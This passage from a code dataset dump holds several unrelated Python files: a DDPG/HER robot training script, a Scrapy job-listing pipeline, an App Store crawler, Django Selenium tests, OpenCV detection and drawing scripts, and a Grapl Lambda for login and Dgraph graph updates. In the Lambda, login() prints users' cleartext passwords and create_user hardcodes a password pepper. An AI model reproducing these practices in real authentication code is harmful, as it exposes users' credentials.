ChaseEnv():\n def __init__(self):\n\n # threshold for detecting success\n self.thr = 1 \n \n def reset(self):\n # reset goal and state at end of episode\n self.goal = self.size * (2*np.random.random(2)-1) \n self.state = self.size * (2*np.random.random(2)-1)\n return np.copy(self.state/self.size), np.copy(self.goal/self.size)\n\n def reward_func(self, state, goal):\n # define two types of states\n good_done = np.linalg.norm(state-goal) <= self.thr\n bad_done = np.max(np.abs(state)) > self.size\n \n if self.reward_type == 'sparse':\n # output binary reward for sparse\n reward = 0 if good_done else -1\n else:\n # output dense reward for other cases\n reward = 5*self.size if good_done else -10 if bad_done else -np.linalg.norm(state-goal)/200\n \n # return done flag as well\n return good_done or bad_done, reward\n\n def step(self, action, scale=4):\n # step through the env\n self.state += action/scale\n \n # obtain reward and done flag\n done, reward = self.reward_func(self.state, self.goal)\n \n # return update\n return np.copy(self.state/self.size), reward, done\n \n def render(self):\n # render state of env\n print(\"\\rstate :\", np.array_str(self.state), \n \"goal :\", np.array_str(self.goal), end=' '*10)\n \n'''\n \ndef main():\n\n reward_type='sparse'\n env=gym.make('FetchPickAndPlace-v1')\n\n # initialize DDPG agent\n agent = DDPGAgent(actor_learning_rate=0.0001, \n critic_learning_rate=0.0001, tau=0.1)\n variance = 5\n \n # use hindsight experience replay or not\n use_her = True\n \n # variables for network training\n num_epochs = 400\n num_episodes = 40\n optimization_steps = 40\n episode_length = 50\n \n # implement K-future strategy for HER\n K = 4\n '''\n the ratio between HER replays and regular replays (e.g. K = 4 -> 4 times\n as many HER replays as regular replays are used)\n \n '''\n\n # initialize buffers for tracking progress\n a_losses = []\n c_losses = []\n ep_mean_r = []\n success_rate = []\n\n # initialize buffers for episode experience\n ep_experience = Episode_experience()\n ep_experience_her = Episode_experience()\n\n # flags for training\n train = True\n\n if train:\n # time the performance of network\n total_step = 0\n start = time.clock()\n\n # loop for num_epochs\n for i in range(num_epochs):\n\n # tracking successes per epoch\n successes = 0\n ep_total_r = 0\n\n # loop over episodes\n for n in range(num_episodes):\n # reset env\n a=env.reset()\n state, goal = a['observation'], a['desired_goal']\n done=False\n\n # run env for episode_length steps\n while not done:\n # track number of samples\n total_step += 1\n\n # obtain action by agent\n state=state.reshape(1,25)\n goal=goal.reshape(1,3)\n action = agent.choose_action(state, goal, variance) ########@$%@%$#@$#@%@\n\n # execute action in env\n obs, reward, done, info = env.step(action)\n next_state=obs['observation'].reshape(1,25)\n \n # track reward and add regular experience\n ep_total_r += reward\n ep_experience.add(state, action, reward, next_state, done, goal)\n state = next_state\n\n # add experience using her\n if total_step % 100 == 0 or done:\n if use_her: \n # add additional experience for each time step\n for t in range(len(ep_experience.memory)):\n # get K future states per time step\n ################\n # Can we improve the K-future strategy?\n ################\n for _ in range(K):\n # get random future t\n future = np.random.randint(t, len(ep_experience.memory))\n\n # get new goal at t_future\n goal_ = ep_experience.memory[future][3][0,3:6] ##########################\n state_ = ep_experience.memory[t][0]\n action_ = ep_experience.memory[t][1]\n next_state_ = ep_experience.memory[t][3]\n done_, reward_ = True, 0\n\n # add new experience to her\n ep_experience_her.add(state_, action_, reward_, \n next_state_, done_, goal_)\n\n # add this her experience to agent buffer\n agent.remember(ep_experience_her)\n ep_experience_her.clear()\n\n # add regular experience to agent buffer\n agent.remember(ep_experience)\n ep_experience.clear()\n\n # perform optimization step\n variance *= 0.9995\n a_loss, c_loss = agent.replay(optimization_steps)\n a_losses += [a_loss]\n c_losses += [c_loss]\n agent.update_target_net()\n\n # if episode ends start new episode\n if done:\n break\n\n # keep track of successes\n successes += reward==0 and done\n\n # obtain success rate per epoch\n success_rate.append(successes/num_episodes)\n ep_mean_r.append(ep_total_r/num_episodes)\n\n # print statistics per epoch\n print(\"\\repoch\", i+1, \"success rate\", success_rate[-1], \n \"ep_mean_r %.2f\"%ep_mean_r[-1], 'exploration %.2f'%variance, end=' '*10)\n\n # output total training time\n print(\"Training time : %.2f\"%(time.clock()-start), \"s\")\n \n # plot the performance stats\n plt.figure()\n plt.plot(success_rate)\n plt.title('Success Rates')\n plt.show()\n \n plt.figure()\n plt.plot(a_losses)\n plt.title('Actor Losses')\n plt.show()\n \n plt.figure()\n plt.plot(ep_mean_r)\n plt.title('Mean Episode Rewards')\n plt.show()\n \n # perform test inference\n agent.saver.save(agent.sess, 'checkpoints/fetchpickandplace.ckpt')\n # load saved model\n agent.saver.restore(agent.sess, 'checkpoints/fetchpickandplace.ckpt')\n\n # evaluate network for 5 episodes\n for _ in range(5):\n r = 0\n z=env.reset()\n state, goal = z['observation'],z['desired_goal'] \n \n # run through the episode\n for _ in range(50):\n env.render()\n\n state=state.reshape(1,25)\n goal=goal.reshape(1,3)\n action = agent.choose_action(state, goal, 0)\n obs, reward, done, _ = env.step(action)\n r += reward\n next_state=obs['observation']\n state = next_state\n time.sleep(0.04)\n\n # render the final result\n if done:\n env.render()\n break\n print(\"reward : %06.2f\"%r, \" success :\", reward==0)\n\n\nif __name__=='__main__':\n main()\n","sub_path":"lowLevelTf_ddpg_her.py","file_name":"lowLevelTf_ddpg_her.py","file_ext":"py","file_size_in_byte":16356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"229251256","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html\nimport hashlib\nimport scrapy\nimport sqlite3\n\n\nclass JobPipeline(object):\n def __init__(self):\n # 初始化数据库\n self.connection = sqlite3.connect('./sqlite.db')\n self.cursor = self.connection.cursor()\n self.cursor.execute('CREATE TABLE IF NOT EXISTS qcwy ' \\\n '(id INTEGER PRIMARY KEY,' \\\n 'url VARCHAR,' \\\n 'company_name VARCHAR,'\n 'job_position VARCHAR,'\n 'city VARCHAR,'\n 'salary VARCHAR,'\n 'company_type VARCHAR,'\n 'company_size VARCHAR,'\n 'company_area VARCHAR,'\n 'experience_requirement VARCHAR,'\n 'education_requirement VARCHAR,'\n 'recruiting_number VARCHAR,'\n 'posted_date VARCHAR,'\n 'job_tag VARCHAR,'\n 'job_info TEXT,'\n 'company_info TEXT'\n ')')\n self.cursor.execute('CREATE TABLE IF NOT EXISTS lagou ' \\\n '(id INTEGER PRIMARY KEY,' \\\n 'url VARCHAR,' \\\n 'company_name VARCHAR'\n ')')\n self.count = 0\n\n def process_item(self, item, spider):\n if spider.name == 'qcwy':\n self.cursor.execute(\"select * from qcwy where url=?\", (item['url'],))\n result = self.cursor.fetchone()\n if result:\n raise DropItem(\"Duplicate item found: %s\" % item)\n else:\n self.cursor.execute(\n \"\"\"INSERT INTO qcwy \n (url, job_position, company_name, city, salary, company_type,\n company_size, company_area, experience_requirement,\n education_requirement, recruiting_number, posted_date,\n job_tag, job_info, company_info) \n VALUES (?,?,?,?,?,?,?,?,?,?,?,?,?,?,?);\"\"\", \n (item['url'], \n item['job_position'],\n item['company_name'],\n item['city'],\n item['salary'],\n item['company_type'],\n item['company_size'],\n item['company_area'],\n item['experience_requirement'],\n item['education_requirement'],\n item['recruiting_number'],\n item['posted_date'],\n item['job_tag'],\n item['job_info'],\n item['company_info'],))\n self.connection.commit()\n elif spider.name == 'lagou':\n self.cursor.execute(\"select * from lagou where url=?\", (item['url'],))\n result = self.cursor.fetchone()\n if result:\n raise DropItem(\"Duplicate item found: %s\" % item)\n else:\n self.cursor.execute(\n \"\"\"INSERT INTO lagou \n (url, company_name) \n VALUES (?,?);\"\"\", \n (item['url'], \n item['company_name']))\n self.connection.commit()\n self.count += 1\n print('%d job info pages parsed' % self.count)\n return item\n","sub_path":"THUDataPiCrawler_51job/job/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":3572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"65846156","text":"from lxml import html\r\nimport requests\r\nimport time\r\n\r\nclass AppCrawler:\r\n\r\n\tdef __init__(self, url_inicial, nivel_max):\r\n\t\tself.url_inicial = url_inicial\r\n\t\tself.nivel_max = nivel_max\r\n\t\tself.nivel_atual = 0\r\n\t\tself.links_nivel = []\r\n\t\tself.apps = []\r\n\r\n\tdef get_app_do_link(self, link):\r\n\t\tpagina_inicial = requests.get(link)\r\n\t\tarvore = html.fromstring(pagina_inicial.text)\r\n\r\n\t\tnome = arvore.xpath('//h1[@class=\"product-header__title app-header__title\"]/text()')[0].strip()\r\n\t\tdesenvolvedor = arvore.xpath('//dd[@class=\"information-list__item__definition l-column medium-9 large-6\"]/text()')[0].strip()\r\n\t\tlinks = arvore.xpath('//a[@class=\"we-lockup targeted-link l-column small-2 medium-3 large-2 ember-view\"]/@href')\r\n\r\n\t\tapp = App(nome, desenvolvedor, links)\r\n\t\t\r\n\t\treturn app\r\n\r\n\tdef crawl(self):\r\n\r\n\t\tapp = self.get_app_do_link(self.url_inicial)\r\n\t\tself.apps.append(app)\r\n\t\tself.links_nivel.append(app.links)\r\n\r\n\t\twhile self.nivel_atual < self.nivel_max:\r\n\t\t\tlinks_atuais = []\r\n\t\t\tfor link in self.links_nivel[self.nivel_atual]:\r\n\t\t\t\tapp_atual = self.get_app_do_link(link)\r\n\t\t\t\tlinks_atuais.extend(app_atual.links)\r\n\t\t\t\tself.apps.append(app_atual)\r\n\t\t\t\ttime.sleep(2)\r\n\t\t\tself.nivel_atual += 1\r\n\t\t\tself.links_nivel.append(links_atuais)\r\n\t\t\r\n\t\treturn\r\n\r\n\r\nclass App:\r\n\tdef __init__(self, nome, desenvolvedor, links):\r\n\t\tself.nome = nome\r\n\t\tself.desenvolvedor = desenvolvedor\r\n\t\tself.links = links\r\n\r\n\tdef __str__(self):\r\n\t\treturn (\"'\" + self.nome + \"'; '\" + self.desenvolvedor + \"'\")\r\n\r\ncrawler = AppCrawler('https://itunes.apple.com/br/app/clash-royale/id1053012308', 1)\r\ncrawler.crawl()\r\nfor app in crawler.apps:\r\n\tprint(app)\r\n","sub_path":"crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":1636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"154258161","text":"from datetime import date\nimport time\nimport sys\n\nfrom django.conf import settings\nfrom django.contrib.staticfiles.testing import StaticLiveServerTestCase\nfrom selenium import webdriver\nfrom selenium.common.exceptions import WebDriverException\nfrom selenium.webdriver.support.ui import WebDriverWait\n\nfrom .index_page import IndexPage\nfrom .server_tools import create_session_on_server, reset_database\nfrom .management.commands.create_session import create_pre_authenticated_session\n\nDEFAULT_WAIT = 5\n\nTEST_EMAIL = 'alice@mockmyid.com'\n\nclass FunctionalTest(StaticLiveServerTestCase):\n\n @classmethod\n def setUpClass(cls):\n for arg in sys.argv:\n if 'liveserver' in arg:\n cls.server_host = arg.split('=')[1]\n cls.server_url = 'http://' + cls.server_host\n cls.against_staging = True\n return\n super().setUpClass()\n cls.against_staging = False\n cls.server_url = cls.live_server_url\n\n @classmethod\n def tearDownClass(cls):\n if not cls.against_staging:\n super().tearDownClass()\n\n def setUp(self):\n if self.against_staging:\n reset_database(self.server_host)\n self.browser = webdriver.Firefox()\n self.browser.implicitly_wait(DEFAULT_WAIT)\n\n def tearDown(self):\n self.browser.refresh()\n self.browser.quit()\n super().tearDown()\n\n def wait_for(self, function_with_assertion, timeout=DEFAULT_WAIT):\n start_time = time.time()\n while time.time() - start_time < timeout:\n try:\n return function_with_assertion()\n except (AssertionError, WebDriverException):\n time.sleep(0.1)\n # one more try, which will raise any errors if they are outstanding\n return function_with_assertion()\n\n def wait_for_element_with_id(self, element_id):\n WebDriverWait(self.browser, timeout=30).until(\n lambda b: b.find_element_by_id(element_id),\n 'Could not find element with id {}. Page text was:\\n{}'.format(\n element_id, self.browser.find_element_by_tag_name('body').text\n )\n )\n\n def switch_to_new_window(self, text_in_title):\n retries = 60\n while retries > 0:\n for handle in self.browser.window_handles:\n self.browser.switch_to_window(handle)\n if text_in_title in self.browser.title:\n return\n retries -= 1\n time.sleep(0.5)\n self.fail('could not find window')\n\n def wait_to_be_logged_in(self, email):\n self.wait_for_element_with_id('id_logout')\n navbar = self.browser.find_element_by_css_selector('.navbar')\n self.assertIn(email, navbar.text)\n\n def wait_to_be_logged_out(self, email):\n self.wait_for_element_with_id('id_login')\n navbar = self.browser.find_element_by_css_selector('.navbar')\n self.assertNotIn(email, navbar.text)\n\n def create_pre_authenticated_session(self, email):\n if self.against_staging:\n session_key = create_session_on_server(self.server_host, email)\n else:\n session_key = create_pre_authenticated_session(email)\n ## to set a cookie we need to first visit the domain.\n ## 404 pages load the quickest!\n self.browser.get(self.server_url + \"/404_no_such_url/\")\n self.browser.add_cookie(dict(\n name=settings.SESSION_COOKIE_NAME,\n value=session_key,\n path='/',\n ))\n\n def test_can_add_monthly_tasks_to_month_log(self):\n self.create_pre_authenticated_session(TEST_EMAIL)\n\n # Alice has heard of a new journaling app. She goes to check\n # out its homepage\n index_page = IndexPage(self).go_to_index_page()\n\n # She sees the name of the application in the title and the\n # header tells her she's on the index of the journal\n self.assertIn('Bullet Journal', self.browser.title)\n header_text = index_page.get_page_title()\n self.assertIn('Index', header_text)\n\n # She sees her index already has a link for this month\n today = date.today()\n month_page = index_page.go_to_month_page(today.year, today.month)\n\n # She sees an input box inviting her to add an item to the monthly\n # tasks list\n input_box = month_page.get_entry_input_box()\n self.assertEqual(\n input_box.get_attribute('placeholder'),\n 'Add an Entry!'\n )\n\n # She adds an item to the monthly task list and sees the list\n # update\n month_page.add_task('Buy groceries')\n month_page.wait_for_new_entry('Buy groceries')\n\n # She adds another task, and sees both tasks displayed\n month_page.add_task('Get car washed')\n month_page.wait_for_new_entry('Buy groceries')\n month_page.wait_for_new_entry('Get car washed')\n\n # Satisfied, she leaves the site\n\n def test_can_add_tasks_to_daily_log(self):\n self.create_pre_authenticated_session(TEST_EMAIL)\n\n # Alice returns to the journaling site and notices a new link\n # directing her to today's log\n index_page = IndexPage(self).go_to_index_page()\n day_page = index_page.go_to_today()\n\n # Here she finds an input box inviting her to add daily tasks\n input_box = day_page.get_entry_input_box()\n self.assertEqual(\n input_box.get_attribute('placeholder'),\n 'Add an Entry!'\n )\n\n # She adds an item to the daily task list and sees the list\n # update\n day_page.add_task('Reticulate splines')\n day_page.wait_for_new_entry('Reticulate splines')\n\n # She adds another task, and sees both tasks displayed\n day_page.add_task('Click cows')\n day_page.wait_for_new_entry('Reticulate splines')\n day_page.wait_for_new_entry('Click cows')\n\n # She sees a link back to the month page\n month_page = IndexPage(self).go_to_this_month()\n\n # On the month view she sees a link to her newly created daily\n # page and sees the tasks she added earlier\n day_page = month_page.go_to_day(date.today().day)\n day_page.wait_for_new_entry('Reticulate splines')\n day_page.wait_for_new_entry('Click cows')\n\n # Satisfied, she leaves the site\n\n def test_can_login(self):\n # Alice returns to the journaling website and sees a login\n # button for the first time\n index_page = IndexPage(self).go_to_index_page()\n self.browser.find_element_by_id('id_login').click()\n\n # A Persona login box appears\n self.switch_to_new_window('Mozilla Persona')\n\n # Alice logs in with her email address\n ## Use mockmyid.com for test email\n self.browser.find_element_by_id(\n 'authentication_email'\n ).send_keys(TEST_EMAIL)\n self.browser.find_element_by_tag_name('button').click()\n\n # The Persona window closes\n self.switch_to_new_window('Bullet Journal')\n\n # She can see that she is logged in\n self.wait_to_be_logged_in(email=TEST_EMAIL)\n\n # Refreshing the page, she sees it's a real session login,\n # not just a one-off for that page\n self.browser.refresh()\n self.wait_to_be_logged_in(email=TEST_EMAIL)\n\n # She clicks \"logout\" to logout\n self.browser.find_element_by_id('id_logout').click()\n self.wait_to_be_logged_out(email=TEST_EMAIL)\n\n # The \"logged out\" status also persists after a refresh\n self.browser.refresh()\n self.wait_to_be_logged_out(email=TEST_EMAIL)\n\n def test_save_multiple_entry_types(self):\n self.create_pre_authenticated_session(TEST_EMAIL)\n\n # Alice returns to the journaling site and notices new buttons\n # when she tries to add entries to the today page\n index_page = IndexPage(self).go_to_index_page()\n day_page = index_page.go_to_today()\n day_page.get_submit_button_group()\n\n # She submits a task, an event, and a note\n day_page.add_task(\"A Task\")\n day_page.add_event(\"An event\")\n day_page.add_note(\"A note\")\n\n # She sees each of her new entries with different bullets\n # representing the different type of entries\n day_page.wait_for_new_task(\"A Task\")\n day_page.wait_for_new_event(\"An event\")\n day_page.wait_for_new_note(\"A note\")\n\n # She tries the same on this month's page\n index_page = IndexPage(self).go_to_index_page()\n month_page = index_page.go_to_this_month()\n\n month_page.add_task(\"A Task\")\n month_page.add_event(\"An event\")\n month_page.add_note(\"A note\")\n\n month_page.wait_for_new_task(\"A Task\")\n month_page.wait_for_new_event(\"An event\")\n month_page.wait_for_new_note(\"A note\")\n\n # Satisfied, she leaves the site\n","sub_path":"functional_tests/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":8922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"1672112","text":"# USAGE\n# python real_time_object_detection.py --prototxt MobileNetSSD_deploy.prototxt.txt --model MobileNetSSD_deploy.caffemodel\n\n# import the necessary packages\nfrom imutils.video import VideoStream\nfrom imutils.video import FPS\nimport numpy as np\nimport argparse\nimport imutils\nimport time\nimport cv2\nfrom datetime import datetime,timedelta\n\n\"\"\"\nCLASSES = [\"background\", \"bolsas_te\", \"botella_plastica\", \"botella_vidrio\", \"carton_alimento\",\n\t\"carton_caja\", \"metal_latas\", \"papel\", \"residuo_banano\", \"residuo_huevo\", \"residuo_manzana\", \"residuo_naranaja\"]\n\"\"\"\nCLASSES = [\"background\", \"organico\", \"plastico\", \"vidrio\", \"cartòn o papel\",\n\t\"cartòn o papel\", \"metal\", \"cartòn o papel\", \"organico\", \"organico\", \"organico\", \"organico\"]\nCOLORS = np.random.uniform(0, 255, size=(len(CLASSES), 3))\n\nprint(\"[INFO] loading model...\")\nnet = cv2.dnn.readNetFromTensorflow(\"frozen_inference_graphV4.pb\", \"graph.pbtxt\")\n\nprint(\"[INFO] starting video stream...\")\n#vs = VideoStream(src=1).start()\nvs = VideoStream(src=0).start()\n\n\ndef adjust_gamma(image, gamma=1.0):\n\t# build a lookup table mapping the pixel values [0, 255] to\n\t# their adjusted gamma values\n\tinvGamma = 1.0 / gamma\n\ttable = np.array([((i / 255.0) ** invGamma) * 255\n\t\tfor i in np.arange(0, 256)]).astype(\"uint8\")\n\n\t# apply gamma correction using the lookup table\n\treturn cv2.LUT(image, table)\n\ndef red_neuronal(frame):\n (h, w) = frame.shape[:2]\n blob = cv2.dnn.blobFromImage(cv2.resize(frame, (300, 300)), size=(300, 300), swapRB=True, crop=False)\n net.setInput(blob)\n detections = net.forward()\n for i in np.arange(0, detections.shape[2]):\n confidence = detections[0, 0, i, 2]\n if confidence > 0.98:\n idx = int(detections[0, 0, i, 1])\n box = detections[0, 0, i, 3:7] * np.array([w, h, w, h])\n (startX, startY, endX, endY) = box.astype(\"int\")\n roi = frame[startY:endY, startX:endX]\n label = \"{}: {:.2f}%\".format(CLASSES[idx],confidence * 100)\n print(label)\n cv2.rectangle(frame, (startX, startY), (endX, endY),COLORS[idx], 2)\n #y = startY - 15 if startY - 15 > 15 else startY + 15\n #cv2.putText(frame, label, (startX, y),cv2.FONT_HERSHEY_SIMPLEX, 0.5, COLORS[idx], 2)\n #cv2.putText(roi, label, (startX, y),cv2.FONT_HERSHEY_SIMPLEX, 0.5, COLORS[idx], 2)\n #cv2.imshow(\"Resultado\", frame)\n print(\"--------------------------------------------------\")\n return frame\n\ntiempo_toma = 3\nwhile True:\n frame = vs.read()\n original = imutils.resize(frame, width=300)\n cv2.imshow(\"Captura\", original)\n key = cv2.waitKey(1) & 0xFF\n if key == ord(\"w\"):\n hora_actual = datetime.now()\n seg_ant = hora_actual.second\n loop_toma = True\n cont_tomas = 0\n while loop_toma:\n frame = vs.read()\n original = imutils.resize(frame, width=300)\n cv2.imshow(\"Captura\", original)\n key = cv2.waitKey(1) & 0xFF\n hora_actual = datetime.now()\n seg_act = hora_actual.second\n if (seg_act != seg_ant):\n tiempo_toma-=1\n seg_ant = seg_act\n if(tiempo_toma == 0):\n cont_tomas+=1\n red_neuronal(original)\n #cv2.imshow(\"toma\"+str(cont_tomas), original)\n tiempo_toma = 3\n if(cont_tomas >= 5):\n loop_toma = False\n \n if key == ord(\"q\"):\n break\ncv2.destroyAllWindows()\nvs.stop()\n","sub_path":"real_time_object_detection.py","file_name":"real_time_object_detection.py","file_ext":"py","file_size_in_byte":3519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"450414188","text":"import cv2\n\nimg = cv2.imread('img/stars.jpg', 1)\n\nimg = cv2.line(img, (0, 0), (255, 255), (0, 0, 255), 2) # draw a line. Image, origin, destiny, color, thikness\nimg = cv2.rectangle(img, (750, 750), (900, 850), (255, 0, 0), 3) # draw a rectangle. origing -> top left, destiny -> bottom right\nimg = cv2.circle(img, (600, 600), 63, (0, 255, 0), 5) # draw a circle\n\nfont = cv2.FONT_HERSHEY_SIMPLEX\nimg = cv2.putText(img, 'Text test', (800, 400), font, 4, (150, 60, 200), 10, cv2.LINE_AA)\n\ncv2.imshow('image', img)\n\ncv2.waitKey(0) # wait for any key press to close windows\ncv2.destroyAllWindows()","sub_path":"drawShape.py","file_name":"drawShape.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"322709193","text":"import json\nimport os\nimport time\nfrom hashlib import sha256, blake2b\nfrom hmac import compare_digest\nfrom random import uniform\nfrom typing import List, Dict, Any\n\nimport boto3\nimport jwt\nimport pydgraph\n\nJWT_SECRET = os.environ['JWT_SECRET']\nORIGIN = \"https://\" + os.environ['BUCKET_PREFIX'] + \"engagement-ux-bucket.s3.amazonaws.com\"\nDYNAMO = None\n\ndef list_all_lenses(prefix: str) -> List[Dict[str, Any]]:\n client_stub = pydgraph.DgraphClientStub('alpha0.engagementgraphcluster.grapl:9080')\n dg_client = pydgraph.DgraphClient(client_stub)\n\n # DGraph query for all nodes with a 'lens' that matches the 'prefix'\n if prefix:\n query = \"\"\"\n query q0($a: string)\n {\n q0(func: alloftext(lens, $a), orderdesc: score)\n {\n uid,\n node_key,\n lens,\n score\n }\n }\"\"\"\n\n variables = {'$a': prefix}\n else:\n query = \"\"\"\n {\n q0(func: has(lens), orderdesc: score)\n {\n uid,\n node_key,\n lens,\n score\n }\n }\"\"\"\n\n variables = {}\n\n txn = dg_client.txn(read_only=True)\n\n try:\n res = json.loads(txn.query(query, variables=variables).json)\n return res['q0']\n finally:\n txn.discard()\n\n# Just query the schema in the future\nprocess_properties = [\n 'process_id', 'node_key', 'create_time', 'arguments',\n 'process_name'\n]\n\nfile_properties = [\n 'node_key', 'file_path'\n]\n\n\nedge_names = [\n 'children',\n 'bin_file',\n 'created_file',\n 'scope',\n]\n\n# Get all nodes in a lens scope, and all of the edges from nodes in the scope to other nodes in the scope\ndef get_lens_scope(dg_client, lens):\n query = \"\"\"\n query q0($a: string)\n { \n q0(func: eq(lens, $a)) {\n uid,\n node_key,\n lens,\n score,\n scope {\n uid,\n expand(_forward_) {\n uid, \n node_key,\n process_name,\n process_id,\n file_path,\n node_type,\n port,\n created_timestamp,\n analyzer_name,\n risk_score,\n ~scope @filter(eq(lens, $a) OR has(risk_score)) {\n uid, node_key, analyzer_name, risk_score,\n lens, score\n }\n }\n }\n } \n }\"\"\"\n\n txn = dg_client.txn(read_only=True)\n\n try:\n variables = {'$a': lens}\n res = json.loads(txn.query(query, variables=variables).json)\n return res['q0']\n finally:\n txn.discard()\n\n\ndef hash_node(node):\n hash_str = str(node['uid'])\n print(node)\n props = []\n for prop_name, prop_value in node:\n if isinstance(prop_value, list):\n if len(prop_value) > 0 and isinstance(prop_value[0], dict):\n if prop_value[0].get('uid'):\n continue\n\n props.append(prop_name + str(prop_value))\n\n props.sort()\n hash_str += \"\".join(props)\n\n edges = []\n\n for prop_name, prop_value in node:\n if isinstance(prop_value, list):\n if len(prop_value) > 0 and isinstance(prop_value[0], dict):\n if not prop_value[0].get('uid'):\n continue\n edge_uids = []\n for edge in prop_value:\n edges.append(prop_name + edge['uid'])\n\n edge_uids.sort()\n edges.append(\"\".join(edge_uids))\n\n edges.sort()\n print(edges)\n hash_str += \"\".join(edges)\n # return hash_str\n return sha256(hash_str.encode()).hexdigest()\n\n\ndef strip_graph(graph, lens, edgename='scope'):\n for outer_node in graph.get(edgename, []):\n for prop, val in outer_node.items():\n if prop == 'risks' or prop == '~risks':\n continue\n\n if isinstance(val, list) and isinstance(val[0], dict):\n new_vals = []\n for inner_val in val:\n rev_scope = inner_val.get('~scope', [])\n to_keep = False\n for n in rev_scope:\n if (n.get('lens') == lens) or n.get('analyzer_name'):\n to_keep = True\n if to_keep:\n new_vals.append(inner_val)\n outer_node[prop] = new_vals\n\n\ndef get_updated_graph(dg_client, initial_graph, lens):\n current_graph = get_lens_scope(dg_client, lens)\n for graph in current_graph:\n strip_graph(graph, lens)\n\n new_or_modified = []\n for node in current_graph:\n if initial_graph.get(node['uid']):\n node_hash = initial_graph[node['uid']]\n if node_hash != hash_node(node):\n new_or_modified.append(node)\n else:\n new_or_modified.append(node)\n\n all_uids = []\n for node in current_graph:\n if node.get('scope'):\n all_uids.extend([node['uid'] for node in node.get('scope')])\n all_uids.append(node['uid'])\n\n removed_uids = set(initial_graph.keys()) - \\\n set(all_uids)\n\n return new_or_modified, list(removed_uids)\n\n\ndef try_get_updated_graph(body):\n print('Trying to update graph')\n client_stub = pydgraph.DgraphClientStub('alpha0.engagementgraphcluster.grapl:9080')\n dg_client = pydgraph.DgraphClient(client_stub)\n\n lens = body[\"lens\"]\n\n # Mapping from `uid` to node hash\n initial_graph = body[\"uid_hashes\"]\n\n print(f'lens: {lens} initial_graph: {initial_graph}')\n\n # Try for 20 seconds max\n max_time = int(time.time()) + 20\n while True:\n print(\"Getting updated graph\")\n updated_nodes, removed_nodes = get_updated_graph(\n dg_client,\n initial_graph,\n lens\n )\n\n updates = {\n 'updated_nodes': updated_nodes,\n 'removed_nodes': removed_nodes\n }\n\n if updated_nodes or removed_nodes:\n print(\"Graph has been updated: \")\n return updates\n\n now = int(time.time())\n\n if now >= max_time:\n print(\"Timed out before finding an update\")\n return updates\n print(\"Graph has not updated\")\n time.sleep(0.75)\n\n\ndef respond(err, res=None, headers=None):\n if not headers:\n headers = {}\n return {\n 'statusCode': '400' if err else '200',\n 'body': {'error': err} if err else json.dumps({'success': res}),\n 'headers': {\n 'Access-Control-Allow-Origin': ORIGIN,\n 'Access-Control-Allow-Credentials': True,\n 'Content-Type': 'application/json',\n 'Access-Control-Allow-Methods': 'GET,POST,OPTIONS',\n 'X-Requested-With': '*',\n **headers\n },\n }\n\n\ndef get_salt_and_pw(table, username):\n print(f'Getting salt for user: {username}')\n response = table.get_item(\n Key={\n 'username': username,\n }\n )\n\n if not response.get('Item'):\n return None, None\n\n return response['Item']['salt'].value, response['Item']['password'].value\n\n\ndef hash_password(cleartext, salt) -> str:\n print('initial hash')\n hashed = sha256(cleartext).digest()\n\n hasher = blake2b(salt=salt)\n hasher.update(hashed)\n return hasher.digest()\n\n\ndef user_auth_table():\n global DYNAMO\n DYNAMO = DYNAMO or boto3.resource('dynamodb')\n\n return DYNAMO.Table(os.environ['USER_AUTH_TABLE'])\n\n\ndef create_user(username, cleartext):\n table = user_auth_table()\n # We hash before calling 'hashed_password' because the frontend will also perform\n # client side hashing\n pepper = \"f1dafbdcab924862a198deaa5b6bae29aef7f2a442f841da975f1c515529d254\";\n\n hashed = sha256(cleartext + pepper).digest()\n for i in range(0, 5000):\n hashed = sha256(hashed).digest()\n\n salt = os.urandom(blake2b.SALT_SIZE)\n password = hash_password(hashed, salt)\n\n table.put_item(\n Item={\n 'username': username,\n 'salt': salt,\n 'password': password\n }\n )\n\n\ndef login(username, password):\n # Connect to dynamodb table\n table = user_auth_table()\n\n # Get salt for username\n salt, true_pw = get_salt_and_pw(table, username)\n if not salt or not true_pw:\n return None\n\n print(f'hashing password {password}')\n # Hash password\n to_check = hash_password(password.encode('utf8'), salt)\n print('hashed')\n\n if not compare_digest(to_check, true_pw):\n time.sleep(round(uniform(0.1, 3.0), 2))\n return None\n\n # Use JWT to generate token\n return jwt.encode({'username': username}, JWT_SECRET, algorithm='HS256').decode('utf8')\n\n\ndef check_jwt(headers):\n encoded_jwt = None\n print(f'headers: {headers}')\n for cookie in headers.get('Cookie', '').split(';'):\n if 'grapl_jwt=' in cookie:\n encoded_jwt = cookie.split('grapl_jwt=')[1].strip()\n\n if not encoded_jwt:\n return False\n\n try:\n jwt.decode(encoded_jwt, JWT_SECRET, algorithms=['HS256'])\n return True\n except Exception as e:\n print(e)\n return False\n\n\ndef lambda_login(event):\n body = json.loads(event['body'])\n print(f'body: {body}')\n login_res = login(body['username'], body['password'])\n # Clear out the password from the dict, to avoid accidentally logging it\n body['password'] = ''\n cookie = f\"grapl_jwt={login_res}; secure; HttpOnly; SameSite=None\"\n if login_res:\n return respond(None, 'True', headers={'Set-Cookie': cookie})\n else:\n return respond('Invalid user or password')\n\n\ndef lambda_handler(event, context):\n\n try:\n if event['httpMethod'] == 'OPTIONS':\n return respond(None, {})\n\n if '/login' in event['path']:\n return lambda_login(event)\n\n if '/checkLogin' in event['path']:\n print('logging in')\n if check_jwt(event['headers']):\n return respond(None, 'True')\n else:\n return respond(None, 'False')\n\n if not check_jwt(event['headers']):\n return respond(\"Must log in\")\n\n if '/update' in event['path']:\n update = try_get_updated_graph(json.loads(event[\"body\"]))\n return respond(None, update)\n\n if '/getLenses' in event['path']:\n prefix = json.loads(event[\"body\"]).get('prefix', 